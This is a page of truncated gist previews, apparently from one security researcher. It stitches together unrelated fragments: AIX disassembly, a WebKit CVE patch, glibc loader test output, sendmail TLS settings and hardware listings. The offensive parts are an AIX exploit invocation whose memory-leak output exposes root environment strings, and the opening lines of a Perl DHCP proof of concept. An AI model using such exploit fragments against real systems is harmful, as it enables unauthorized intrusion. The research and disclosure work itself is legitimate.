This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.text:10000354 .using unk_30000BB4, %r31 | |
.text:10000354 stw %r3, 0x110+var_28(%sp) | |
.text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV" | |
.text:1000035C bl .getenv | |
.text:10000360 lwz %rtoc, 0x110+saved_toc(%sp) | |
.text:10000364 lwz %r29, off_30001568 # dword_300015E4 | |
.text:10000368 .using dword_300015E4, %r29 | |
.text:10000368 cmpwi %r3, 0 | |
.text:1000036C bne loc_100006D0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2010-4577 | |
Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685 | |
Bug report inaccessible but changeset: | |
CSSParserValueList* args = val->function->args.get(); | |
3632 3632 if (args && args->size() == 1) { | |
3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ id | |
uid=208(tmb) gid=1(staff) | |
$ ./sploit 1000000 -1 | |
maxiumumleak: 1000000 | |
target: 17760424 | |
$031097N 04j0a06000000000I404d0Qa109>f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH | |
10030: [+] operating on non setuid binary | |
10030: [+] being opened via LD_LIBRARY_PATH | |
10030: [+] not marked insecure=unqualified/ | |
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH) | |
10030: [+] operating on non setuid binary | |
10030: [+] being opened via LD_LIBRARY_PATH | |
10030: [+] not marked insecure=unqualified/ | |
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH) | |
10030: [+] operating on non setuid binary |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ LD_LIBRARY_PATH=/test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH | |
$ LD_LIBRARY_PATH=test ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH | |
19635: not fully qualified, marking insecure=test/ | |
19635: not fully qualified, marking insecure=test/ | |
19635: not fully qualified, marking insecure=test/ | |
19635: not fully qualified, marking insecure=test/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine] | |
use strict; | |
use IO::Socket; | |
use Net::DHCP::Packet; | |
use Net::DHCP::Constants; | |
my $serveripaddress = "10.10.10.1"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
+ usb0 IPv6 Invoke_AD4E4603568803A4 _bp2p._tcp local | |
+ usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local | |
+ usb0 IPv4 Invoke_AD4E4603568803A4 _bp2p._tcp local | |
+ usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local | |
+ usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local | |
+ usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Taken from http://www.michaelm.info/blog/?p=1256: | |
LOCAL_CONFIG | |
O ServerSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE | |
O ClientSSLOptions=+SSL_OP_NO_SSLv2 +SSL_OP_NO_SSLv3 +SSL_OP_CIPHER_SERVER_PREFERENCE | |
O CipherList=EDH+CAMELLIA:EDH+aRSA:EECDH+aRSA+AESGCM:EECDH+aRSA+SHA384:EECDH+aRSA+SHA256:EECDH:+CAMELLIA256:+AES256:+CAMELLIA128:+AES128:+SSLv3:!aNULL:!eNULL:!LOW:!3DES:!MD5:!EXP:!PSK:!DSS:!RC4:!SEED:!ECDSA:CAMELLIA256-SHA:AES256-SHA:CAMELLIA128-SHA:AES128-SHA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <sys/mman.h> | |
#include <stdio.h> | |
int main(int argc, char **argv) { | |
int filehandle; | |
char *mmapbuffer; | |
filehandle = open("sarpedon-000002.vmdk", O_RDWR); | |
mmapbuffer = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
... | |
description: Computer | |
product: Google Compute Engine () | |
vendor: Google | |
serial: GoogleCloud-<hex> | |
width: 64 bits | |
capabilities: smbios-2.4 dmi-2.4 vsyscall32 | |
configuration: boot=normal uuid=<uuid> | |
... | |
*-core |